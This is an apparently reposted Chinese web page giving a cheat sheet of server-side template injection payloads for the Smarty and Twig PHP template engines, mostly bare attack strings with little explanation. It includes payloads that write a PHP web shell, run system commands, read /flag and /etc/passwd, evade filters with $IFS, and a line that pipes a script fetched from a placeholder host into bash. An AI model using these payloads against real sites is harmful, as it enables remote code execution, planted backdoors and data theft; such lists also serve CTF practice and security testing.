| |
|
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
| -> PHP知识库 -> SSTI相关总结 (smarty/twig) -> 正文阅读 |
|
|
[PHP知识库]SSTI相关总结 (smarty/twig) |
SSTI在用户可控的地方可能发生。一、PHP smarty注入smarty是php的一个模板引擎。更明确的来说,它可以帮助开发者更好的分离程序逻辑和页面显示。这里略过一些罗嗦的smarty的介绍。 *payload (1) 获取smarty版本号: {$smarty.version} (2) 执行php代码 {php}echo `id`;{/php} //注意这个在3.x版本的时候就已经废弃了 (3) getshell {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']);?>",self::clearConfig())} (4) RCE {system('ls')} {if show_source('/flag')}{/if} {if passthru(“tac fl*”)}{/if} 反弹shell: {system('curl http://xxx:xxxx/dev.txt|bash')} 二、twig注入(1) 基础注入: {{7*7}} {{7*'7'}} {{dump(app)}} {{app.request.server.all | join(',')}} (2) 任意文件读取: {{'/etc/passwd'|file_excerpt(1,30)}} (3) RCE: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{['id'] | filter('system')}} {{['cat\x20/etc/passwd'] | filter('system')}} {{['cat$IFS/etc/passwd'] | filter('system')}} (4) 如果有FILTER_VALIDATE_EMAIL时: email = "{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@xx.com |
|
|
| PHP知识库 最新文章 |
| Laravel 下实现 Google 2fa 验证 |
| UUCTF WP |
| DASCTF10月 web |
| XAMPP任意命令执行提升权限漏洞(CVE-2020- |
| [GYCTF2020]Easyphp |
| iwebsec靶场 代码执行关卡通关笔记 |
| 多个线程同步执行,多个线程依次执行,多个 |
| php 没事记录下常用方法 (TP5.1) |
| php之jwt |
| 2021-09-18 |
|
|
| 上一篇文章 下一篇文章 查看所有文章 |
|
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
| 360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/23 11:59:37- |
|
| 网站联系: qq:121756557 email:121756557@qq.com IT数码 |